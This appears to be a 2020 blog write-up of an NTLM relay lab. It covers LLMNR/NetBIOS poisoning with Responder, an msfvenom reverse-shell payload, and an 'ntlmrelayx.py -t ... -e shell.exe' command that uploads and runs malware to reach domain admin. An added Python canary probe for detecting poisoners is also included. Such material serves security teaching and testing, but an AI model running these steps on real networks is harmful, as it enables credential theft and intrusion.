NTLM Relay Attack

Orhan YILDIRIM
5 min read, Apr 12, 2020


NetBIOS (Network Basic Input/Output System) is the system that allows different clients on a local network to communicate with each other.

It is an API developed by Sytek in 1983 for IBM to improve communication on a LAN. When an operating system is installed on a computer, that computer is assigned a NetBIOS name. The name consists of 16 ASCII characters, of which Microsoft allows 15 to be chosen freely.

NetBIOS eases administration in domains with many client systems. Although a domain-joined client is defined to the system as “accounts.empire.local”, its NetBIOS name is simply “accounts”.

Windows uses a WINS server to map NetBIOS names to IP addresses so that systems can communicate with each other through this API. When a system is addressed by its NetBIOS name, the local name cache is checked first, then the WINS server is queried, and if no response is received the name is resolved by broadcast.

As the screenshot shows, it is very convenient in a company network to reach a system just by typing its NetBIOS name, but this convenience brings dangers with it.

You reach the system you want by typing its NetBIOS name, as in the screenshot above; below I will try to explain what can happen if you mistype even a single letter.

NTLM Relay Attack

With the open-source tool “Responder”, LLMNR, NetBIOS NS and mDNS poisoning can be performed on the local network. Responder answers name requests that users have typed incorrectly as if it were the genuine host and starts the communication. Acting as the requested HTTP / SMB / MSSQL / FTP / LDAP service, it then captures the NTLMv1 / NTLMv2 / LMv2 and basic HTTP authentication hashes that the client sends when it tries to authenticate.

As seen in the screenshot, when a user who wanted to access the “accounts” system accidentally typed “accountssss”, NetBIOS NS poisoning was performed with the “responder” tool, and the attacker system captured the user’s NTLMv2 authentication and used it to log in to the real “accounts” system. By obtaining the token of a member of the “Domain Admins” group who had not properly ended their session on that system, a session on the domain controller was obtained.
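As an added example that is not part of the original post, the following script turns the mistyped-name behaviour described above into a detection check: it broadcasts a NetBIOS name query for a “canary” name that does not exist on the LAN (the mistyped “accountssss” is a good candidate), and any positive reply exposes a poisoner, because a legitimate network never answers for a name that nobody owns. The packet layout follows RFC 1002; the sample reply and the 192.0.2.10 address are constructed for the offline check.

```python
# Added example (not from the original post): a canary-name probe for NBT-NS
# poisoning; a nonexistent name (e.g. "accountssss") should never get an answer.
import socket
import struct

QUERY_FLAGS, RESPONSE_BIT = 0x0110, 0x8000    # query+RD+broadcast; R bit (RFC 1002)
TYPE_NB, CLASS_IN, NBNS_PORT = 0x0020, 0x0001, 137

def encode_name(name: str, suffix: int = 0x20) -> bytes:
    """First-level encoding: 15-char padded name + suffix, each nibble -> 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(0x41 + n for b in raw for n in (b >> 4, b & 0x0F))
    return b"\x20" + enc + b"\x00"   # length 32, encoded name, terminator

def build_query(name: str, txid: int = 0x1234) -> bytes:
    """NAME QUERY REQUEST: header, then one question of type NB, class IN."""
    header = struct.pack("!HHHHHH", txid, QUERY_FLAGS, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", TYPE_NB, CLASS_IN)

def parse_response(pkt: bytes, name: str, txid: int = 0x1234):
    """Return the IP claimed by a positive NB answer for name/txid, else None."""
    if len(pkt) < 62 or pkt[12:46] != encode_name(name):
        return None
    rid, flags, _qd, ancount = struct.unpack("!HHHH", pkt[:8])
    rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[46:56])
    if (rid != txid or not flags & RESPONSE_BIT or ancount == 0
            or rtype != TYPE_NB or rclass != CLASS_IN or rdlen < 6):
        return None
    return socket.inet_ntoa(pkt[58:62])   # RDATA: 2 bytes NB_FLAGS, then IPv4

# Constructed sample of the reply a poisoner would send (192.0.2.10 is a test address).
SAMPLE_REPLY = (struct.pack("!HHHHHH", 0x1234, 0x8580, 0, 1, 0, 0)
                + encode_name("accountssss")
                + struct.pack("!HHIH", TYPE_NB, CLASS_IN, 165, 6)
                + b"\x00\x00" + socket.inet_aton("192.0.2.10"))

def probe(name: str, timeout: float = 2.0, txid: int = 0x1234) -> list:
    """Broadcast the canary query; return [(source_ip, claimed_ip)] per answer."""
    hits, s = [], socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    s.settimeout(timeout)
    s.sendto(build_query(name, txid), ("255.255.255.255", NBNS_PORT))
    try:
        while True:                      # collect every answer until the timeout
            data, (src, _) = s.recvfrom(1024)
            ip = parse_response(data, name, txid)
            if ip:
                hits.append((src, ip))
    except socket.timeout:
        s.close()
        return hits
```

Running `probe("accountssss")` on a healthy segment returns an empty list; each entry it does return is a host answering for a name it cannot legitimately own, which is the signature of the poisoning shown in the screenshot.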

The following steps were carried out for this attack vector.

A payload was created to be run on the target system when a connection is made to it using the NTLM authentication captured on the network.

The “msfvenom” tool was used for this. The payload used for the reverse connection in this study is shown in the screenshot below.

For the NetBIOS poisoning, the “responder” tool was chosen so that every wrong request on the network is answered. Because “ntlmrelayx.py” itself answers requests as an “SMB” and “HTTP Server” while it is running, the “SMB” and “HTTP Server” options must be set to “OFF” in the “responder.conf” file.

We will run the “ntlmrelayx.py” tool with the command below.

ntlmrelayx.py -t 172.16.1.101 -e shell.exe

The output of the tool when run with this command is shown in the screenshot below.

When the connection is established, a listener is set up for the payload that will run on the target system.

The user “summer.leonard” sent a mistyped request while trying to access a different system on the network.

The NTLMv2 authentication of the user who made the wrong request was relayed by “ntlmrelayx.py” from the attacker system to the system “172.16.1.101”, and a share with write permission was found on that system.

The tool uploaded the malware under a random name to the target system and ran it there with service privileges.

A “meterpreter” session was obtained once the malware ran on the target system.

Because the malware that provides this session runs as a service, the operating system’s service protection mechanism will terminate it. For this reason, it is necessary to migrate to a different service or process.


After a session has been obtained on the target system, the remaining stages of the attack can be seen in the screenshots below.

References: LLMNR ve NETBIOS-NS Poisoning / Halil Dalabasmaz, 2016, BGA Security (https://www.slideshare.net/bgasecurity/szma-testlerinde-llmnr-ve-netbiosns-poisoning-kullanm)
